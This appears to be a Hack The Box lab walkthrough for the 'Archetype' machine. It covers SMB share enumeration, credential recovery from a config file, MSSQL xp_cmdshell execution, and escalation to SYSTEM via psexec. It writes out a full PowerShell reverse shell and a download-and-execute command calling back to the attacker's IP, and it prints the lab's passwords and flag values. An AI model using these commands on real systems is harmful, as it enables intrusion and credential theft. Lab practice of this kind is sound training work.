Enumeration
As always, let's start with nmap:
nmap -sV -sC IP
Replace IP by the IP of your target machine (Archetype)
The IP of the target machines are always changing so make sure you type the correct one. You can find it on your Hack The Box account.
We can see that port 445 is open which is usually associated with file sharing (SMB). So let's find out if we can list the shares available using:
smbclient -L IP
SMB authentication always require a username. If you don't specify one, it will use your VM username as default.
When prompted for the password just press enter
We can see there are 4 shares available. Let's check the first share called ADMIN$
smbclient \\\\IP\\ADMIN$
When prompted for the password, just press enter.
Access is denied.
Let's check the second share called backups:
smbclient \\\\IP\\backups
When prompted for the password, just press enter.
We got access to that share!
ls
Let's download the file prod.dtsConfig to our VM
get prod.dtsConfig
The get command will download the file to your current directory/home directory. Open your home directory and check the content of that file
Looks like we found some credentials:
User ID=ARCHETYPE\sql_svc
Password=M3g4c0rp123
To exit the share, just type:
exit
Let's move on. The nmap we used at the beginning also showed that port 1433 is open, which is usually associated with SQL server. Now that we have some credentials, we just need to find a way to connect and authenticate to the MSSQL server. Let's use Impacket's tool mssqlclient.py to do that.
locate mssqlclient
Let's change directory:
cd /usr/share/doc/python3-impacket/examples
python3 mssqlclient.py
This tells us that we need to type: username@targetIP
This also tells us that we need to add -windows-auth
python3 mssqlclient.py sql_svc@IP -windows-auth
Type the password we found earlier:
Password=M3g4c0rp123
We successfully authenticated to the Microsoft SQL server!
help
Looks like we can use xp_cmdshell followed by the command we want to execute, using xp_cmdshell {cmd}
First, we need to enable it by typing enable_xp_cmdshell
enable_xp_cmdshell
We are told to run the RECONFIGURE statement to install
RECONFIGURE
Now we can use xp_cmshell followed by a command we want to execute:
xp_cmdshell whoami
Now let's try to find out if we have sysadmin right by typing:
SELECT IS_SRVROLEMEMBER ('sysadmin')
The output is 1 so it means we are part of the sysadmin group!
Now, let's try to get a stable reverse shell. Let's use this reverse shell found at: https://gist.githubusercontent.com/egre55/c058744a4240af6515eb32b2d33fbed3/raw/2c6e4a2d6fd72ba0f103cce2afa3b492e347edc2/powershell_reverse_shell.ps1
We just need to change 2 things from the script:
- The IP ---> this is the IP of your VM (the attackers' machine)
If you don't know your IP, open a new command prompt window and type ifconfig
- The port number ---> this is the port on which you will listen using netcat. We will start our netcat listener on port 4444
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.11",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Go to your Downloads folder and create a new file called shell.ps1
Open it and copy paste the script above, then save your file.
Now we need to get the target machine to go and download our PowerShell script shell.ps1
To do that, we will create a simple web server on our attacker's machine (our VM):
From your VM, open a new command prompt window and go to the Downloads directory:
cd Downloads
sudo python3 -m http.server 8080
This command will start a web server in our current directory (as in in the Downloads directory)
Do not close this window! Otherwise it will stop your web server.
Open your browser and check that the website has been created
http://10.10.14.11:8080/
10.10.14.11 is the IP of my VM - it will be different for you. Make sure you type your VM's IP. If you don't know the IP of your VM, open a new command prompt window and type ifconfig
Now we need to install ufw (uncomplicated firewall) on our VM.
Open a new command prompt window and type
sudo apt install ufw
sudo ufw enable
We now need to add a rule so that the target machine can connect back to our attacker machine (our VM)
sudo ufw allow from 10.129.243.63 proto tcp to any port 8080,4444
10.129.243.63 is the target machine
port 8080 because our webserver is on port 8080
port 4444 because we will start our netcat listener on port 4444
Now, still from your VM, open a new command prompt window and set up your netcat listener
nc -lnvp 4444
Only after you set up your netcat, go back to the target machine and type:
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.11:8080/shell.ps1\");"
10.10.14.11 is the IP of my VM (attacker's machine) - The IP of your VM will be different. If you don't know the IP of your VP, open a new command prompt window and type ifconfig
Go back to your netcat and you should have a connection:
Type
whoami
cd C:\Users
dir
cd sql_svc
dir
cd Desktop
dir
type user.txt
3e7b102e78218e935bf3f4951fec21a3
You got the user flag! Congratulations!
It's always good to check the console history file where we can see the frequently accessed files and/or any executed commands. The history file is called ConsoleHost_history.txt and can be found in this directory: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine
cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine
cat ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
We just found more credentials!
The net use or net.exe use command is used to show detailed information about currently mapped drives and devices. It is used this way:
net use [{devicename | *}] \\computername\sharename /user:username
devicename ---> Use this option to specify the Drive letter (here Drive letter T)
\\computername\sharename ---> specifies the name of the computer, computername, and the shared resource, sharename
More info on net use can be found at https://www.lifewire.com/net-use-command-2618096
Privilege Escalation
Impacket also has a tool called psexec.py and we can use this tool to connect to the server using the credentials we just found.
From your VM, open a new prompt window
locate psexec.py
cd /usr/share/doc/python3-impacket/examples
python3 psexec.py
python3 psexec.py administrator@10.129.243.63
10.129.243.63 is the IP of the target machine
Type the password we just found and press enter
MEGACORP_4dm1n!!
whoami
We just escalated our privileges and we are now the nt authority\system
You can usually find the root flag at C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
dir
type root.txt
b91ccec3305e98240082d4474b848528
Congratulations! you got the root flag!
Comentários